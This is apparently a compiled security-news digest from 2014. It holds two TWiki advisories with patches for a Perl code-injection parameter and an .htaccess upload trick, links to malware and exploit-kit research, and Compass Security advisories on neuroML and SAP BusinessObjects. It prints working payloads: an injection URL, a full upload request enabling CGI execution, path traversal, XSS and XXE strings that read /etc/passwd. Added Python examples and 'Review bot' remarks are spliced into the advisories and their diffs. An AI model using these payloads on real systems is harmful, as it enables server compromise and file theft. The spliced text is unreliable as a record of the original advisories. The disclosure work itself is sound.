
TWiki Security Alert CVE-2014-7236: Remote Perl code execution with query string to debug TWiki plugins

This is an advisory for TWiki administrators: The debugenableplugins request parameter allows arbitrary Perl code execution.

TWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people.

   * Vulnerable Software Version
   * Attack Vectors
   * Impact
   * Severity Level
   * MITRE Name for this Vulnerability
   * Details
   * Countermeasures
   * Hotfix for TWiki Production Release 6.0.0
   * Hotfix for Older Affected TWiki Releases
   * Verify Hotfix
   * Authors and Credits
   * Action Plan with Timeline
   * External Links
   * Feedback

---++ Vulnerable Software Version

   * TWiki-6.0.0 (TWikiRelease06x00x00)
   * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04)
   * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02)
   * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02)
   * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04)
   * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02)
   * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05)

---++ Attack Vectors

Using an HTTP GET request towards a TWiki server, add a specially crafted 'debugenableplugins' request parameter to TWiki's view script (typically port 80/TCP). Prior authentication may or may not be necessary.

---++ Impact

A remote attacker can execute arbitrary Perl code to view and modify any file the webserver user has access to.

---++ Severity Level

The TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess [1] and assigned the following severity level:

   * Severity 1 issue: The web server can be compromised

---++ MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7236 [7] to this vulnerability.

---++ Details

It is possible to execute arbitrary Perl code by adding a =debugenableplugins= parameter with a specially crafted value. Example:

http://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit

The TWiki site is vulnerable if you see a page with text "Vulnerable!".

__Background:__

TWiki allows enabling specific plugins for debug purposes using a 'debugenableplugins' parameter that lists the plugins to enable. In order to support this dynamic loading of plugins, TWiki inserts the plugin name into the following Perl =eval= statement without sanitizing the plugin name:
<verbatim>
my $p = $this->{module};
eval "use $p;";
</verbatim>
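To make the mechanism concrete, here is an added example (not TWiki's own code) that reimplements the three ways of turning the request parameter into a plugin list: the pre-patch split, the Item7558 patch's strip-and-filter, and a validate-instead-of-rewrite variant. It only builds the strings that `eval "use $p;"` would receive and never executes them; `PAYLOAD` is the URL-decoded form of the advisory's example, and the function names are ours.

```python
import re

# Constructed value: the URL-decoded form of the request parameter shown in
# the advisory (the "\r\n" stay literal backslash sequences, as in the URL).
PAYLOAD = 'BackupRestorePlugin;print("Content-Type:text/html\\r\\n\\r\\nVulnerable!");exit'


def plugin_list_unsanitized(param):
    """Pre-patch behaviour: split on commas/whitespace and trust whatever is left."""
    return [p for p in re.split(r"[,\s]+", param) if p]


def plugin_list_patched(param):
    """Item7558 patch: strip everything but [a-zA-Z0-9], keep names ending in 'Plugin'."""
    cleaned = (re.sub(r"[^a-zA-Z0-9]", "", p) for p in re.split(r"[,\s]+", param))
    return [n for n in cleaned if n.endswith("Plugin")]


def plugin_list_strict(param):
    """Validate-instead-of-rewrite variant: a name is a clean identifier or is dropped."""
    return [p for p in re.split(r"[,\s]+", param) if re.fullmatch(r"[A-Za-z0-9]+Plugin", p)]


def eval_statements(names):
    """The strings TWiki's `eval "use $p;"` would be handed, one per name (built, never run)."""
    return [f"use {n};" for n in names]


if __name__ == "__main__":
    # Pre-patch, the whole payload is one "plugin name", so the ';' and the
    # print(...) after it become Perl code inside the string eval.
    print("unsanitized:", eval_statements(plugin_list_unsanitized(PAYLOAD)))
    # Patched, the stripped name ends in 'exit', not 'Plugin', and is dropped.
    print("patched:    ", eval_statements(plugin_list_patched(PAYLOAD)))
    mixed = "BackupRestorePlugin, Foo;Plugin, EmptyPlugin"
    print("patched:    ", plugin_list_patched(mixed))   # 'Foo;Plugin' silently becomes 'FooPlugin'
    print("strict:     ", plugin_list_strict(mixed))    # 'Foo;Plugin' is rejected
```

The last two lines show the design difference between the patch and the strict variant: stripping characters neutralises the injection but can turn a malformed name into a different, valid-looking one, while a whitelist match rejects it.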

---++ Countermeasures

   * Apply hotfix (see patch below).
   * Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]

---++ Hotfix for TWiki Production Release 6.0.0

Apply the patch listed in the TWiki bug item at TWikibug:Item7558 [8]. The patch is also listed here, but because e-mail transport alters whitespace, using the patch below is not recommended.

NOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.

Affected file: twiki/lib/TWiki/Plugins.pm

Patch to sanitize the 'debugenableplugins' parameter:

=======( 8>< CUT )===============================================
--- TWiki/Plugins.pm.save1   2014-01-09 02:10:56.000000000 -0500
+++ TWiki/Plugins.pm   2014-10-01 20:30:36.000000000 -0400
@@ -186,8 +186,11 @@

     unless( $allDisabled ) {
         if ( $query && defined( $query->param( 'debugenableplugins' ))) {
-            @pluginList = split( /[,\s]+/,
-                                 $query->param( 'debugenableplugins' ));
+            @pluginList =
+              grep { /Plugin$/ }
+              map { s/[^a-zA-Z0-9]//go; $_ } # Item7558: Sanitize parameter
+              split( /[,\s]+/, $query->param( 'debugenableplugins' ));
+
         } else {
             if( $TWiki::cfg{PluginsOrder} ) {
                 foreach my $plugin( split( /[,\s]+/,
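Review bot: the map block rewrites each name in place with s/[^a-zA-Z0-9]//go and grep then keeps anything ending in Plugin, so a malformed value such as 'Foo;Plugin' is silently turned into 'FooPlugin' and still reaches eval "use $p;". Matching instead of rewriting, e.g. `grep { /^[A-Za-z0-9]+Plugin$/ }`, rejects such input outright and reads as the whitelist it is meant to be. The /o modifier on a constant pattern is redundant and can go. Since the string eval itself stays, this filter is the only thing between the parameter and the interpreter; a comment saying so would stop a future cleanup from loosening it.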
=======( 8>< CUT )===============================================

---++ Hotfix for Older Affected TWiki Releases

Apply above patch (line numbers may vary).

---++ Verify Hotfix

To verify the patch add the following parameter to any TWiki topic:

?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit

The site is vulnerable if a page is returned with text "Vulnerable!"

---++ Authors and Credits

   * Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue to the twiki-security@lists.sourceforge.net mailing list
   * PeterThoeny for creating the fix, patch and advisory
   * HideyoImazu for creating the TWiki-6.0.1 production release [2]

---++ Action Plan with Timeline

   * 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]
   * 2014-10-01 - developer verifies issue - PeterThoeny
   * 2014-10-01 - developer fixes code - PeterThoeny
   * 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu
   * 2014-10-06 - security team creates advisory with hotfix - PeterThoeny
   * 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny
   * 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny
   * 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny

---++ External Links

[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess
[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01
[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 (will be created on 2014-10-09)
[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList
[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList
[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList
[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236 - CVE on MITRE.org
[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7558

---++ Feedback

Please provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 once it exists (this topic will be created on Mon, 2014-10-09).

Please send an e-mail to twiki-security@lists.sourceforge.net if you have any questions before Monday.

-- Peter Thoeny - 2014-10-09


--
> Peter Thoeny     - Peter09[at]Thoeny.org
http://bit.ly/MrTWiki - consulting on enterprise collaboration
http://TWiki.org - is your team already TWiki enabled?
> Knowledge cannot be managed, it can be discovered and shared
> This e-mail is:   (_) private    (_) ask first    (x) public

TWiki Security Alert CVE-2014-7237: Apache configuration file upload on TWiki on Windows server

This is an advisory for TWiki administrators: Attaching a specially named file allows remote upload of an Apache configuration file. This applies to native TWiki installations on Windows; the TWiki-VM (virtual machine) running in a Windows server environment is not affected.

TWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people.

   * Vulnerable Software Version
   * Attack Vectors
   * Impact
   * Severity Level
   * MITRE Name for this Vulnerability
   * Details
   * Countermeasures
   * Hotfix for TWiki Production Release 6.0.0
   * Hotfix for Older Affected TWiki Releases
   * Verify Hotfix
   * Authors and Credits
   * Action Plan with Timeline
   * External Links
   * Feedback

---++ Vulnerable Software Version

   * TWiki-6.0.0 (TWikiRelease06x00x00)
   * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04)
   * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02)
   * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02)
   * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04)
   * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02)
   * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05)

---++ Attack Vectors

Use an HTTP POST request towards a TWiki on Windows server to upload a specially named file (typically port 80/TCP). Prior authentication is typically required.

---++ Impact

A remote attacker can upload a '.htaccess' file that may make uploaded files executable on the server.

---++ Severity Level

The TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess and assigned the following severity level:

   * Severity 1 issue: The web server can be compromised

---++ MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7237 [3] to this vulnerability.

---++ Details

If you attach a file named '.htaccess.' (e.g. a '.htaccess' configuration file with a leading null character and a trailing dot) to a TWiki server on Windows, the attached file will be saved with the name '.htaccess'. Assuming Apache is configured to allow directory-level configuration files, it is therefore possible to upload a configuration file that controls the attachment directory. This can be exploited to remotely upload and execute files on the TWiki server.

__Background:__

In order to provide its users with dynamic content functionality, TWiki allows any sort of file to be uploaded and attached to articles and pages. This may seem like a dangerous thing to do, but TWiki protects itself reasonably well: it makes sure the file does not carry a dangerous extension (such as .php or .cgi) by using the following regex:

^(\.htaccess|.*\.(?i)(?:php[0-9s]?(\..*)?|[sp]htm[l]?(\..*)?|pl|py|cgi))$

And if it does, it adds a '.txt' extension at the end of it.

On top of that, TWiki also uses an .htaccess file with the 'Options None' directive, which prohibits any use of CGI execution, and with the PHP engine flag set to 'Off', which as one can understand - disables PHP execution.

Apart from all these defenses, TWiki makes sure it uses only the base name of the uploaded file (the file name without any directory path), removes any leading dots, and removes any dangerous characters (such as the famous null byte). These security measures leave us with almost nothing to do. Even without the Perl-based defenses, the .htaccess file does a pretty good job of securing the upload directory against any kind of code execution. So, the only logical thing to do is to try to upload an .htaccess file directly into the upload folder in order to bypass the original .htaccess file located at the root of the TWiki 'pub' directory.

To do that, we first must upload a file that starts with a dot. Let's look at the steps TWiki takes to secure the file name: first it takes the file name without any directory path, then it removes any leading dots, then it removes any dangerous characters, and finally it checks the file name against the regex above.

So, uploading a file named '.htaccess' just won't work because of the leading dots removal. But what if we use a file name like '.htaccess'? TWiki will first try to remove any leading dots, but because the name doesn't start with one (because of the leading null byte) none will be removed. Then it will remove any dangerous characters, our null byte, and that leaves us with a nice clean '.htaccess' name.

But what about the regex? The regex only checks for a file named exactly '.htaccess'; a file named '.htaccesstest', for example, will be uploaded successfully.

But what can we do with that? In Windows, a file name ending with a dot has that dot removed when the file is created. That means uploading a file named '.htaccess.' will pass the regex check, and the dot will be removed when the file is stored, resulting in a file named '.htaccess'.

So, if we upload a file named '.htaccess.' that sets the 'Options' directive to 'All' and uses the 'SetHandler' directive to allow CGI scripts to be executed under a different extension, we will be able to execute code on the server.

__Example attack post:__

=======( 8>< CUT )===============================================
POST /Research/TWiki-6.0.0/bin/upload.cgi/Main/WebHome HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7AqcZ2eUSlxvoRFj
Cookie: TWIKISID=e7df45fd5e783fd6a44391dadd782c43
Content-Length: 391

------WebKitFormBoundary7AqcZ2eUSlxvoRFj
Content-Disposition: form-data; name="crypttoken"

22b989482d3418971a50f4914dca0dcf
------WebKitFormBoundary7AqcZ2eUSlxvoRFj
Content-Disposition: form-data; name="filepath2"; filename=".htaccess."
Content-Type: text/plain

Options All
<FilesMatch \.lolz$>
 SetHandler cgi-script
</FilesMatch>
=======( 8>< CUT )===============================================
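The step ordering described in the Background is what decides whether '.htaccess.' survives. The added example below (not TWiki's code) reimplements both orderings in Python: the pre-patch sequence as the Background describes it, and the sequence from the Item7560 hunks, followed by an emulation of Windows dropping trailing dots on file creation. The UploadFilter is the regex quoted above; the "dangerous characters" step is reduced to the NUL byte because the real filter is not on the page, and the control-character range is widened to \x1f. All function names are ours.

```python
import re

# UploadFilter as quoted in the advisory; the inline (?i) is written in
# Python's scoped form (?i:...) and the substitution is case-insensitive
# like the Perl /goi.
UPLOAD_FILTER = re.compile(
    r"^(\.htaccess|.*\.(?i:php[0-9s]?(\..*)?|[sp]htm[l]?(\..*)?|pl|py|cgi))$",
    re.IGNORECASE,
)


def sanitize_prepatch(name):
    """Pre-patch order as the Background describes it: directory part, leading
    dots, 'dangerous' characters, UploadFilter. The dangerous-character step is
    reduced to the NUL byte here (assumption; the real filter is not on the page)."""
    name = re.sub(r"^.*[\\/]", "", name)
    name = re.sub(r"^[.\\/]+", "", name)
    name = name.replace("\x00", "")
    return UPLOAD_FILTER.sub(r"\1.txt", name)


def sanitize_patched(name):
    """Order from the Item7560 hunks. Control characters go first, trailing dots
    are stripped before anything else sees the name, and an empty or dot-leading
    result gets a '_' prefix. The range is widened to \\x1f (the hunk stops at \\x19)."""
    name = re.sub(r"^.*[\\/]", "", name)
    name = re.sub(r"[\x00-\x1f]", "", name)
    name = re.sub(r"\.*$", "", name)
    name = name.replace(" ", "_")
    name = re.sub(r"^[.\\/]+", "", name)
    name = UPLOAD_FILTER.sub(r"\1.txt", name)
    if name == "" or name.startswith("."):
        name = "_" + name
    return name


def windows_stored_name(name):
    """Win32 drops trailing dots and spaces when it creates a file; emulated here
    so the example runs on any platform."""
    return name.rstrip(". ")


def compare(name):
    """(name on disk pre-patch, name on disk post-patch) for one submitted file name."""
    return (windows_stored_name(sanitize_prepatch(name)),
            windows_stored_name(sanitize_patched(name)))


if __name__ == "__main__":
    # Constructed file names: the advisory's '.htaccess.' with a leading NUL,
    # the plain variants it says already fail, and a script with a path prefix.
    for submitted in ["\x00.htaccess.", ".htaccess.", ".htaccess", "../../shell.php"]:
        shown = submitted.encode("unicode_escape").decode()
        before, after = compare(submitted)
        print(f"{shown:24} pre-patch -> {before!r:14} patched -> {after!r}")
```

Only the NUL-prefixed, dot-suffixed name differs between the two columns: pre-patch it lands on disk as '.htaccess', patched it becomes 'htaccess', which Apache ignores.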

---++ Countermeasures

   * Apply hotfix (see patch below), or
   * Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]

---++ Hotfix for TWiki Production Release 6.0.0

Apply the patch listed in the TWiki bug item at TWikibug:Item7560 [8]. The patch is also listed here, but because e-mail transport alters whitespace, using the patch below is not recommended.

NOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.

Affected file: twiki/lib/TWiki/Sandbox.pm

Patch to sanitize uploaded file names:

=======( 8>< CUT )===============================================
--- TWiki/Sandbox.pm.save1   2014-10-01 19:50:45.000000000 -0400
+++ TWiki/Sandbox.pm   2014-10-01 20:13:31.000000000 -0400
@@ -194,8 +194,11 @@
     # remember to test with IE.
     $fileName =~ s{[\\/]+$}{};  # Get rid of trailing slash/backslash (unlikely)
     $fileName =~ s!^.*[\\/]!!;  # Get rid of directory part
+    $fileName =~ s/[\x00-\x19]//go;  # Item7560: Remove non-printable characters

     my $origName = $fileName;
+    # Item7560: Strip trailing dots
+    $fileName =~ s/\.*$//o;
     # Change spaces to underscore
     $fileName =~ s/ /_/go;
     # Strip dots and slashes at start
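Review bot: the control-character strip `s/[\x00-\x19]//go` stops at 0x19 and so leaves 0x1A to 0x1F (and 0x7F) in the name; \x1f looks like the intended upper bound, so this reads like a typo worth fixing before release. Also, `my $origName = $fileName;` is taken before the new trailing-dot strip, so $origName still carries the trailing dots; check whether anything downstream uses it for a stored path or a displayed name.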
@@ -214,6 +217,11 @@
     # Append .txt to some files
     $fileName =~ s/$TWiki::cfg{UploadFilter}/$1\.txt/goi;

+    # Item7483, prevent a null file name
+    if ( $fileName eq '' || $fileName =~ /^\./ ) {
+        $fileName = '_' . $fileName;
+    }
+
     # Untaint
     $fileName = untaintUnchecked($fileName);
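Review bot: the comment cites Item7483 while the rest of the patch is tagged Item7560; either confirm this is a pre-existing fix carried along in the same diff or align the reference. The guard runs after the UploadFilter substitution, so an input of '.' or '' now yields '_'; both deserve a unit test since they are exactly the inputs the trailing-dot strip above newly produces.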

=======( 8>< CUT )===============================================

---++ Hotfix for Older Affected TWiki Releases

Apply above patch (line numbers may vary).

---++ Verify Hotfix

To verify the patch, upload a file with a POST as described in the Details section. If you can't create a file with a null character, use any other non-printable character, such as '%01.htaccess.'

---++ Authors and Credits

   * Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue with detailed description to the twiki-security@lists.sourceforge.net mailing list
   * PeterThoeny for creating the fix, patch and advisory
   * HideyoImazu for creating the TWiki-6.0.1 production release [2]

---++ Action Plan with Timeline

   * 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]
   * 2014-10-01 - developer verifies issue - PeterThoeny
   * 2014-10-01 - developer fixes code - PeterThoeny
   * 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu
   * 2014-10-06 - security team creates advisory with hotfix - PeterThoeny
   * 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny
   * 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny
   * 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny

---++ External Links

[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess
[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01
[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 (will be created on 2014-10-09)
[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList
[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList
[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList
[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7237 - CVE on MITRE.org
[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7560

---++ Feedback

Please provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 once it exists (this topic will be created on Mon, 2014-10-09).

Please send an e-mail to twiki-security@lists.sourceforge.net if you have any questions before Monday.

-- Peter Thoeny - 2014-10-09



[ FORENSICS WALK-THROUGH: DFIRCON EAST SMARTPHONE FORENSICS CHALLENGE ]

Today I was asked by a good friend of mine on whether there could be 2 answer(s) to the last question in DFIRCON EAST Smartphone Forensics Challenge.

Being the curious cat, I downloaded the Challenge, had a quick look and decided to write this out while I’m at it. It seems like we are given an iOS backup folder and an Android .apk file.

more here..........http://www.vxsecurity.sg/2014/10/09/forensics-walk-through-dfircon-east-smartphone-forensics-challenge/

The Rovnix reincarnation

Back in June 2014, we discovered a new malware campaign that was using a new DGA. This sparked our interest.

After unpacking, some of the samples that we retrieved contained an interesting debug string “ISFB” inside the binary code.

more here..........https://www.csis.dk/en/csis/news/4472/

Evolution of the Nuclear Exploit Kit

Exploit kits remain an efficient mechanism for cyber criminals to distribute malware. Such kits include exploits for multiple vulnerabilities within a single malicious webpage. Criminals can check operating systems, web browsers and browser plugins for anything that is not fully patched and launch an exploit specific to the out of date software. Using this technique criminals can maximise their chances of infecting visitors but reduce their exposure to only infect those who are vulnerable; presumably in order to remain inconspicuous.

more here...........http://blogs.cisco.com/talos/evolution-nuclear-ek/

Democracy in Hong Kong Under Attack

Over the last few months, Volexity has been tracking a particularly remarkable advanced persistent threat (APT) operation involving strategic web compromises of websites in Hong Kong and Japan. In both countries, the compromised websites have been particularly notable for their relevance to current events and the high profile nature of the organizations involved. In particular the Hong Kong compromises appear to come on the heels of the Occupy Central Campaign shifting into high gear. These compromises were discovered following the identification of malicious JavaScript that had been added to legitimate code on the impacted websites.


more here.............http://www.volexity.com/blog/?p=33

Imperva Web Application Attack Report (WAAR) #5

Today, we are proud to release the 5th installment of our annual Web Application Attack Report.

For those of you new to this report, Imperva’s Web Application Attack Report (WAAR) is a thorough analysis of the web application attack surface and attacker behavior trends over a specific period of time – in this case, from August 1, 2013 to April 30, 2014. The findings covered in this report come from an analysis of the data collected by our Community Defense crowdsourced threat intelligence capability (free to all ThreatRadar users), which tracks actual attacks that hit our web application firewalls all over the globe, as well as from our Honeypots and various other intelligence systems.

This year, we have decided to increase the breadth of the report by providing meta-analysis on top of the statistical information, correlating to system types, verticals, technologies as well as to geographical information.


more here.............http://blog.imperva.com/2014/10/imperva-web-application-attack-report-waar-5.html

Enhancements to Dyre Banking Trojan

The Dyre banking Trojan made its first debut in June 2014, targeting large financial institutions across the globe. In September, PhishLabs’ R.A.I.D (Research, Analysis, and Intelligence Division) observed a number of enhancements to the banking Trojan that further increases the danger of the threat.

more here...........http://blog.phishlabs.com/enhancements-to-dyre-banking-trojan

Blind & Time Based SQL Injection in Yahoo Contributors Network

“The Yahoo Contributors Network allows writers, photographers, and videographers to share their knowledge and passion (…) and earn money by pushing your unique perspectives…” From the looks of the database and description, the database may have carried sensitive and private personal information for those participating and getting paid for their work. While looking around the website, I came across two vulnerabilities in the following URLs/files: http://contributor.yahoo.com/forum/search/? and http://contributor.yahoo.com//library/payments/data-table/?


more here...........http://nahamsec.com/2014/10/a-tale-of-2-yahoo-bug-bounty-reports/

CSNC-2014-004 neuroML - Multiple Vulnerabilities

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:  neuroML
# Version:  <=v1.8.1 (Confirmed: v1.8.1)
# Vendor:   neuroML.org
# CSNC ID:  CSNC-2014-004
# CVD ID:   <none>
# Subject:  Multiple Vulnerabilities
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Philipp Promeuschel <philipp.promeuschel@csnc.ch>
# Date:     10.10.2014
#
#############################################################

Abstract:
-------------
The NeuroML project focuses on the development of an
XML (eXtensible Markup Language) based description language
that provides a common data format for defining and
exchanging descriptions of neuronal cell and network models.
The current approach in the project uses XML schemas to
define the model specifications.[0]


Affected:
---------
Vulnerable:
neuroML version 1.8.1

Not tested:
Other versions of neuroML


Technical Description:
----------------------
The NeuroML Validator, can be used to check the validity
of NeuroML files.

[Full Path Disclosure]:
        http://www.neuroml.org/NeuroMLValidator/Transform.jsp?localFile=NeuxroMLFiles/Schemata/v1.8.1/Level1/Metadata_v1.8.1.xsd&xslFile=x

        Example output:
        Unable to locate file /var/lib/tomcat7/webapps/NeuroMLValidator/x

[Local File Inclusion]:
        http://www.neuroml.org/NeuroMLValidator/ViewNeuroMLFile.jsp?localFile=../../../../../etc/passwd

        Example output:
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
        bin:x:2:2:bin:/bin:/usr/sbin/nologin
        sys:x:3:3:sys:/dev:/usr/sbin/nologin
        sync:x:4:65534:sync:/bin:/bin/sync
        games:x:5:60:games:/usr/games:/usr/sbin/nologin
        man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
        lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
        mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
        news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
        uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
        proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

[Cross Site Scripting]:
        http://www.neuroml.org/NeuroMLValidator/Transform.jsp?localFile=&xslFile=x%3Cimg%20src=%27s%27%20onError=%27alert%281%29;%27%3E
        http://www.neuroml.org/NeuroMLValidator/Validation.jsp?pastedFile=XSS%3C/textarea%3Ex%3Cimg%20src=%27s%27%20onError=%27alert%281%29;%27%3E

[XML External Entities]:
        http://www.morphml.org:8080/NeuroMLValidator/Transform.jsp?pastedFile=%2B%253C%2521DOCTYPE%2Bfoo%2B%255B%2B%2B%250D%250A%2B%2B%2B%253C%2521ELEMENT%2Bfoo%2BANY%2B%253E%250D%250A%2B%2B%2B%253C%2521ENTITY%2Bxxe%2BSYSTEM%2B%2522file%253A%252F%252F%252Fetc%252Fpasswd%2522%2B%253E%255D%253E%253Cfoo%253E%2526xxe%253B%253C%252Ffoo%253E&xslFile=NeuroMLFiles%2FSchemata%2Fv1.8.1%2FLevel1%2FMorphML_v1.8.1_GENESIS.xsl
        Example output:
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
        bin:x:2:2:bin:/bin:/usr/sbin/nologin
        sys:x:3:3:sys:/dev:/usr/sbin/nologin
        sync:x:4:65534:sync:/bin:/bin/sync
        games:x:5:60:games:/usr/games:/usr/sbin/nologin
        man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
        lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
        mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
        news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
        uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
        proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
        www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
        backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
        list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

        Used XML:
         <!DOCTYPE foo [
           <!ELEMENT foo ANY >
           <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>


Timeline:
---------
2014-05-04: Discovered Flaws
2014-05-05: Contacted Developer
2014-05-05: Developer Response
2014-05-28: Developer fixed all issues
2014-10-10: Disclosure of the advisory

References:
-----------
[0] http://www.neuroml.org/introduction
[1] http://blog.csnc.ch/2012/08/secure-xml-parser-configuration/

WordPress Websites Continue to Get Hacked via MailPoet Plugin Vulnerability

The popular Mailpoet(wysija-newsletters) WordPress plugin had a serious file upload vulnerability a few months back, allowing an attacker to upload files to the vulnerable site.

This issue was disclosed months ago, and the MailPoet team patched it promptly. It seems, though, that many are still not getting the word, or are blatantly not updating, because we are seeing another string of mass exploitation attempts against WordPress websites. Those that have not updated are getting infected repeatedly via this vector; the issue is further compounded because the attackers are using it as a springboard into the rest of their account, further compromising their entire account.

more here..........http://blog.sucuri.net/2014/10/wordpress-websites-continue-to-get-hacked-via-mailpoet-plugin-vulnerability.html

SAP Security Note 1908531 - XXE in BusinessObjects Explorer

#######################################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product:           BusinessObjects Explorer
# Vendor:            SAP AG
# Subject:           Untrusted XML input parsing possible in SBOP Explorer
# Risk:              High
# Effect:            Remotely exploitable
# Author:            Stefan Horlacher
# Date:              2014-10-10
# SAP Security Note: 1908531 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer is vulnerable to XML External Entity (XXE)
attacks. This affects the whole application and not only the examples
described below.
This vulnerability can be triggered as an unauthenticated user, as the
login request uses vulnerable XML processing as well.


Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer


Technical Description:
----------------------
BusinessObjects Explorer does not validate user-defined XML input.
Additionally, the service runs an XML parser that allows
references to external entities. This leads to XML External Entity (XXE)
attacks [1].

In the following example, an explorationSpaceUpdate request has been
used to store the content of the file /etc/passwd in the value of a country:

        URL: /explorer/polestar_xml.jsp
        Request extract:
                POST /explorer/polestar_xml.jsp HTTP/1.1
                [CUT BY COMPASS]
                Content-Length: 33258
=>              xmlParameter=<!DOCTYPE dataDiscovery [ <!ENTITY include SYSTEM "/etc/passwd">]>
                <dataDiscovery><headers><correlationId>7E7B01A6-E238-716E-2082-
                0EB94532438F</correlationId><transactionId>0F14D6BC-ED78-8570-1415-
                0EB94532416E</transactionId></headers><session token="[CUT BY COMPASS]"
                locale="en_US"/><request><explorationSpaceUpdate infoObjectCUID="[CUT BY COMPASS]"
                displayName="" infospaceVersion="2" tip="[CUT BY COMPASS]" [CUT BY COMPASS]
                <value>%26include;</value><items selected="[CUT BY
                COMPASS]"/></row><row><value>AT</value><items selected="[CUT BY
                COMPASS]"/></row><row><value>AU</value><items selected="[CUT BY
                COMPASS]"/></row><row><value>BD</value><items
                [CUT BY COMPASS]
        Response extract:
